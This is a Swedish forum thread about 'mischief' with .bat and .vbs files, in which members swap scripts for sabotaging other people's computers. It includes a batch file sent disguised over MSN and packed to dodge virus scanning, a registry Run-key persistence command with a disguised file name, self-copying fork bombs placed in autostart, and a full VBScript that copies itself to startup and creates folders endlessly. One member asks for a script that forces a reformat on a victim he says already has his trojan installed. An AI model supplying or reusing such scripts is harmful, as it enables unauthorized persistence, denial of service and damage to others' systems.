Jävulskap & annat kul med .cmd/.bat filer

Permalänk

Finns det något fint för att muppa upp en ipod nano?

Visa signatur

Hej. Ge mig pengar

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av DenBlåaTomburken
Finns det något fint för att muppa upp en ipod nano?

Ja, det går att installera Rockbox på den och helt plötsligt så fungerar hans ipod bättre! DET är ondskefullt! (Det tråkiga är att rockbox är lätt att ta bort och att man fortfarande kan använda ipodens gamla mjukvara genom att trycka på en knapp när den startar upp, men säg det roliga som är perfekt)!

Visa signatur
Permalänk
Citat:

Ursprungligen inskrivet av alexwebnet
Nja inte direkt, Vill bara kunna lista ut alla som är inne,
Och sen skicka net msg till att börja med.

Gör en kolla.bat fil med detta:
sc config messenger start= auto
cls
net start messenger
cls
del kolla.bat
exit

Sen skickar du den på t.ex. msn till nån kompis (nerpackad i t.ex. winrar, annars tror msn att det är virus) och när han öppnat den så kan du skicka "net send" till honom. Antingen så skickar du bara till alla IP, eller så tar du reda på just hans IP, t.ex. genom att lägga till det i .bat filen och den skickar hans IP till dig via messenger.

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av kaptenperre
Gör en kolla.bat fil med detta:
sc config messenger start= auto
cls
net start messenger
cls
del kolla.bat
exit

Sen skickar du den på t.ex. msn till nån kompis (nerpackad i t.ex. winrar, annars tror msn att det är virus) och när han öppnat den så kan du skicka "net send" till honom. Antingen så skickar du bara till alla IP, eller så tar du reda på just hans IP, t.ex. genom att lägga till det i .bat filen och den skickar hans IP till dig via messenger.

Men funkar det över internet? I så fall, finns det inget script som skickar hans ip till en email eller något? =P

Permalänk

Går inte att använda messenger över internet, bara inom nätverk inom samma "grupp" (typ MsHome).

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem

Går det göra så att det poppar upp rutor i .bat som man kan göra i .vbs eller kan man kopiera saker till autostart med .vbs? =/

- fobiC

Permalänk
Citat:

Ursprungligen inskrivet av fobiC
Går det göra så att det poppar upp rutor i .bat som man kan göra i .vbs eller kan man kopiera saker till autostart med .vbs? =/

- fobiC

Du kan kopiera till autostart med .bat elelr med .vbs. Eller så kan du lägga till den i registret med hjälp av:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msdir32 /t REG_SZ /d %systemroot%\system32\msdir32.bat

start %systemroot%\system32\msdir32.bat

Du kan också ta bort den med "del". Då kan den du ger det till inte kolla vart den kopierats. Men ska du bara ha .bat filen i autostart så använd copy. Bara att söka på google efter dos commands så är första träffen en sida där allt jag skrivit står. Google fungerar alltid

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem

va tror ni om detta?

move %0 "%ALLUSERSPROFILE%\Start-meny\Program\Autostart"
:aa
start
goto aa

Permalänk

Hejsan alla!

Någon som vet hur man fixar typ en "confirm dialog" eller nått liknande?
Typ "Do you wish to proceed? Yes/No" I .bat menar jag då, inte vbs.
Tack på förhand!

Visa signatur

Abyssa |
Asus P5Q, E8400@3.6GHz, ATi Radeon HD4870x2, 4GB DDR2-RAM, 1.5TB storage. Dinwoze Vista/Ubuntu

Permalänk
Medlem

Jag skulle behöva en batch-fil som gör att det ända sättet att få igång datorn är att formatera, tex ta bort några viktiga filer. Går det? Om det går så får ni gärna skriva hur.
Och om ni av någon anledning inte vill skriva här så vänligen skicka ett pm

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Nolart
Jag skulle behöva en batch-fil som gör att det ända sättet att få igång datorn är att formatera, tex ta bort några viktiga filer. Går det? Om det går så får ni gärna skriva hur.
Och om ni av någon anledning inte vill skriva här så vänligen skicka ett pm

Formatera om hårddisken för att några viktiga systemfiler fattas?

Permalänk

Altså varför är den här tråden kvar? Det är ju att häda att låta den här tråden stå i Programmerings-forumet, bara scriptkiddiefasoner och folk som vill ha koder till att förstöra för andra.

Visa signatur

Asus Maximus II formula, E8400 @ 3.9GHz, 4GB Dominator DDR2, Radeon HD4850.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av SwedishPshyco
Altså varför är den här tråden kvar? Det är ju att häda att låta den här tråden stå i Programmerings-forumet, bara scriptkiddiefasoner och folk som vill ha koder till att förstöra för andra.

Meningen är väl att det ska vara kul, och det kan vara riktigt kul om man gör det på rätt sätt.

Men som det senaste inlägget ang. formatering är ju inte direkt roligt.
Sånt är bara idiotiskt.

Permalänk
Citat:

Ursprungligen inskrivet av SwedishPshyco
Altså varför är den här tråden kvar? Det är ju att häda att låta den här tråden stå i Programmerings-forumet, bara scriptkiddiefasoner och folk som vill ha koder till att förstöra för andra.

Har haft riktigt roligt på LAN med sånt här Bara man gör det mot rätt personer och på rätt sätt är det grymt kul.

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av echo
Meningen är väl att det ska vara kul, och det kan vara riktigt kul om man gör det på rätt sätt.

Men som det senaste inlägget ang. formatering är ju inte direkt roligt.
Sånt är bara idiotiskt.

Jag ska bara använda det på en person som förstört för mig ett antal ggr, jag har äntligen fått in en trojan på personens dator så jag har tänkt lägga den i autostart.

Permalänk
Citat:

Ursprungligen inskrivet av Nolart
Jag ska bara använda det på en person som förstört för mig ett antal ggr, jag har äntligen fått in en trojan på personens dator så jag har tänkt lägga den i autostart.

Men lite väl dumt att göra så att han måste formatera. Du kan väl hitta på något som är drygt som han får ha i en vecka, och får han inte bort det kan du hjälpa honom sen.

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem

Detta skapar mappar konstant och lägger sig i autostart,,,, datorn kommer sega riktigt ordentligt

On Error Resume Next Set WSHShell = WScript.CreateObject("WScript.Shell") FileName = WScript.ScriptFullName Directory = WshShell.CurrentDirectory Autostart = WSHShell.SpecialFolders("AllUsersStartup") Autostart2 = WSHShell.SpecialFolders("Startup") Set fso = CreateObject("Scripting.FileSystemObject") Set f2 = fso.GetFile( FileName ) f2.Copy ( Autostart & "\Fil.vbs") f2.Copy ( Autostart2 & "\Fil.vbs") Desktop = WSHShell.SpecialFolders("Desktop") Folder = WSHShell.SpecialFolders("AllUsersDesktop") If fso.FolderExists( Folder ) Then Desktop = WSHShell.SpecialFolders("AllUsersDesktop") Else Desktop = WSHShell.SpecialFolders("Desktop") End if i = 1 w = 1 do fso.CreateFolder("Ö:\" & i ) i = i + 1 Loop while w=1

komigåg vbs på slutet !!!!!!!!

och byt ut Ö:\ mot valfritt ex. C:\

OBS detta är inget skämt program

jag blev avstängd från skolans nät pga. att jag kört denna på en Gemensam HDD och det bildades ca. 240 000 innan de kom på det.

detta ångrar jag

Visa signatur

E6300 | Thermalright Ultra-120 eXtreme + Noctua 120mm 1200rpm | Gigabyte GA-965P-DS3 | 3GB Corsair XMS2-6400 CL5

Permalänk
Avstängd

hur får man reda på andras datorers ip från sin egen dator

Permalänk

Har säkert varit uppe:

:start start %0 goto start

Permalänk
Citat:

Ursprungligen inskrivet av xobx
hur får man reda på andras datorers ip från sin egen dator

Finns program du kan kolla sånt med. Annars kan du ju köra en ping 192.168.0.1
...
192.168.0.255

Man brukar oftast ha de IP numren på LAN. Är det ett stort LAN kan det vara annorlunda.

Edit: Såg nu att du inte skrivit nåt om LAN. Är nog lättast med ett program då. Testade ett en gång och då kollade jag allas IP i den by jag bodde i. Kollade genom hela listan av IP som vi var tilldelade och såg då vilka som var uppkopplade. Men jag tror det är olagligt att kolla efter öppna portar, så gör inte det.

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av HeavvyMetal
Japp du kan skapa en textfil och sen byta filändelse med kommandotolken.
Tex. txt-filen heter hej.txt
Skriv:
ren hej.txt hej.bat

Nej, sådär krånglig väg behöver du inte ta. Det räcker att spara anteckningarna som te.x "asdf.bat" MED cituationstecknen.

Permalänk
Avstängd

En klassiker på UNIX system, är att skapa script som:

1. makedir MJAU
2. cd MJAU
3. goto 1.

Detta är en jävla pina att få bort. Det blir så många kataloger så det går inte att skriva "remove -r MJAU" eller något liknande. Detta äter cpu, hårddisken blir slö men hårddisken fylls inte.

Enda sättet att få bort alla kataloger, är att hoppa längst ned, och börja radera katalogerna därifrån. Hoppa upp en nivå, radera, upprepa.

Var försiktig med detta script. En jävla pina - har jag hört sägas. Har inte provat själv.

Permalänk
Citat:

Ursprungligen inskrivet av emilsson
En klassiker på UNIX system, är att skapa script som:

1. makedir MJAU
2. cd MJAU
3. goto 1.

Detta är en jävla pina att få bort. Det blir så många kataloger så det går inte att skriva "remove -r MJAU" eller något liknande. Detta äter cpu, hårddisken blir slö men hårddisken fylls inte.

Enda sättet att få bort alla kataloger, är att hoppa längst ned, och börja radera katalogerna därifrån. Hoppa upp en nivå, radera, upprepa.

Var försiktig med detta script. En jävla pina - har jag hört sägas. Har inte provat själv.

Ja, för det är ju jättesvårt att köra en kill och rm -rd

Visa signatur

Asus Maximus II formula, E8400 @ 3.9GHz, 4GB Dominator DDR2, Radeon HD4850.

Permalänk
Avstängd
Citat:

Ursprungligen inskrivet av SwedishPshyco
Ja, för det är ju jättesvårt att köra en kill och rm -rd

Ok, mr Besserwisser. Kör det scriptet och låt det gå i 5-10min och sen kan du prova att göra en kill och rm -rd. Berätta sen hur det gick. Lycka till.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av emilsson
Ok, mr Besserwisser. Kör det scriptet och låt det gå i 5-10min och sen kan du prova att göra en kill och rm -rd. Berätta sen hur det gick. Lycka till.

Det bör inte vara så knepigt, skall testa

EDIT: Ja det tog kanske 12 mikrosekunder och ta bort allt.

Permalänk
Avstängd
Citat:

Ursprungligen inskrivet av Vijjje
Det bör inte vara så knepigt, skall testa

EDIT: Ja det tog kanske 12 mikrosekunder och ta bort allt.

Ok, då hade jag fel. Eller rättare sagt, "Unix system administration guide" av Nemeth et al - boken hade fel. Där står det att man inte kan göra precis så som du beskriver, för pathen blir för lång. Kommer inte ihåg detaljerna till exakt varför.

Men du lät den köra ett bra tag, så det bildades bra många nivåer? Typ 10 min?

Ok, man ska inte lita på allt som står i böckerna, oavsett om boken är "bibeln" på sitt område. Jag gjorde fel som litade obetingat på Unix-bibeln. Sorry.

Permalänk
Medlem

Om man ska vara väldigt vanlig och inte scriptkiddie-aktig är ett hett tips (som inte alls förstör speciellt mycket, men är fasligt kul att se)

Att:
1. Ta en screen av personens skrivbord, vända uppochner på den i ps, sätta som bakgrundsbild.

2. Rotera skärmen (via ati, nvidia, eller vad man nu kan tänkas ha för gfx)

3. "Dölj ikoner"

4. Dra ner mouse-sens till lägsta

Skapar definitivt griller i huvudet på folk ;P

Visa signatur

I am a shaman, magician
The sun is purple, 3D dimensions
I am for mental extensions.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av emilsson
Ok, då hade jag fel. Eller rättare sagt, "Unix system administration guide" av Nemeth et al - boken hade fel. Där står det att man inte kan göra precis så som du beskriver, för pathen blir för lång. Kommer inte ihåg detaljerna till exakt varför.

Men du lät den köra ett bra tag, så det bildades bra många nivåer? Typ 10 min?

Ok, man ska inte lita på allt som står i böckerna, oavsett om boken är "bibeln" på sitt område. Jag gjorde fel som litade obetingat på Unix-bibeln. Sorry.

Problemet är att pathen blir just för lång, mkdir vägrar då att skapa en ny mapp. Så man får inte så många mappar. Jag testade på FreeBSD, kanske går sämre på något anat OS.

Permalänk
Avstängd
Citat:

Ursprungligen inskrivet av Vijjje
Problemet är att pathen blir just för lång, mkdir vägrar då att skapa en ny mapp. Så man får inte så många mappar. Jag testade på FreeBSD, kanske går sämre på något anat OS.

Det kanske du kunde berättat? Att den inte skapade så många mappar? Jag skrev i första inlägget att många många mappar skapas och det slöar ner datorn men att hårddisken inte blir full. Om många mappar inte skapas, så kanske du borde sagt det?

Jaja, om nu den här boken har rätt - dvs Unix bibeln - så är det ett helvete att ta bort mappar med många underkataloger, därför att pathen blir för lång. Tydligen kan man inte skapa så många mappar i FreeBSD? Själv tycker jag det låter märkligt. Skumt OS som inte låter en skapa vilka kataloger man vill.

Jag tror att om man kör ett OS som tillåter en att skapa de kataloger man vill på, så orsakar det scriptet hel jävla massa problem. Någon som vågar testa på ett annat OS (som tillåter en att göra vad man vill med sina mappar)?

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av emilsson
Det kanske du kunde berättat? Att den inte skapade så många mappar? Jag skrev i första inlägget att många många mappar skapas och det slöar ner datorn men att hårddisken inte blir full. Om många mappar inte skapas, så kanske du borde sagt det?

Jaja, om nu den här boken har rätt - dvs Unix bibeln - så är det ett helvete att ta bort mappar med många underkataloger, därför att pathen blir för lång. Tydligen kan man inte skapa så många mappar i FreeBSD? Själv tycker jag det låter märkligt. Skumt OS som inte låter en skapa vilka kataloger man vill.

Jag tror att om man kör ett OS som tillåter en att skapa de kataloger man vill på, så orsakar det scriptet hel jävla massa problem. Någon som vågar testa på ett annat OS (som tillåter en att göra vad man vill med sina mappar)?

Du kan inte skapa hur många mappar som helst. Phaten blir för lång och mkdir vägrar göra fler mappar.